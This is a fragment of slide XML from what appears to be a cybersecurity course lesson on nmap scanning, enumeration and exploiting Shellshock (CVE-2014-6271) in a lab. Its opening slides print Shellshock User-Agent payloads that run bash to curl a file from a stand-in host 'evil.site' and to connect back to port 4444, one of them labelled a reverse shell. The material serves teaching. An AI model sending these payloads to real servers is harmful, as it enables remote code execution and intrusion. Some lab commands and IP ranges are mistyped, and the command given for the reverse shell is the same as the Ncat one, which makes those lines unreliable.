              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /tmp &amp;&amp; curl -0 http://evil.site/mal.php'</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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279"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2280" name="Google Shape;2280;p12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27</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284"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2285" name="Google Shape;2285;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="801350"/>
            <a:ext cx="8595300" cy="3005700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Activity: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Scanning and Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this exercise, you will perform host discovery and service enumeration on a target subnet. Then, you will scan live hosts for vulnerability to Shellshock and research Heartbleed.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>Instructions sent via Slack.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2286" name="Google Shape;2286;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>30 Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2287" name="Google Shape;2287;p13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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2288" name="Google Shape;2288;p130"/>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lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Linux Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lab instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Part 3: Vulnerability Assessment and Research</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2289" name="Google Shape;2289;p130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840300" y="3510063"/>
            <a:ext cx="2028900" cy="297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solidFill>
                <a:srgbClr val="990000"/>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293"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2294" name="Google Shape;2294;p13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29</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2295" name="Google Shape;2295;p131"/>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296" name="Google Shape;2296;p131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536250" y="3682625"/>
            <a:ext cx="4220400" cy="720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rgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Scanning and Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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047"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048" name="Google Shape;2048;p105"/>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Class Objectives</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Google Shape;2049;p105"/>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In today’s class, we’ll cover:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2050" name="Google Shape;2050;p10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3</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Google Shape;2051;p105"/>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052" name="Google Shape;2052;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="1319425"/>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800"/>
              <a:t>Nmap Warm-Up</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Google Shape;2053;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="2004950"/>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800"/>
              <a:t>Understanding CVE-2014-6271: The Shellshock Vulnerability </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Google Shape;2054;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100" y="2695275"/>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800"/>
              <a:t>Scanning and Enumerating a Target Network</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2055" name="Google Shape;2055;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385575"/>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800"/>
              <a:t>Identifying Servers Vulnerable to Shellshock</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2056" name="Google Shape;2056;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4078300"/>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800"/>
              <a:t>Exploiting Shellshock with Burp Repeater</a:t>
            </a:r>
            <a:endParaRPr sz="180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300"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2301" name="Google Shape;2301;p132"/>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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2302" name="Google Shape;2302;p132"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2303" name="Google Shape;2303;p13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30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2304" name="Google Shape;2304;p132"/>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305" name="Google Shape;2305;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="196782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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2306" name="Google Shape;2306;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="353572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dirty="0"/>
              <a:t>Test hosts discovered for vulnerability to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr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310"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2311" name="Google Shape;2311;p133"/>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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2312" name="Google Shape;2312;p133"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2313" name="Google Shape;2313;p13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31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2314" name="Google Shape;2314;p133"/>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315" name="Google Shape;2315;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2316" name="Google Shape;2316;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="196782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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2317" name="Google Shape;2317;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="353572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dirty="0"/>
              <a:t>Test hosts discovered for vulnerability to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr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321"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2322" name="Google Shape;2322;p134"/>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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2323" name="Google Shape;2323;p134"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2324" name="Google Shape;2324;p13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32</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2325" name="Google Shape;2325;p134"/>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326" name="Google Shape;2326;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="780600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
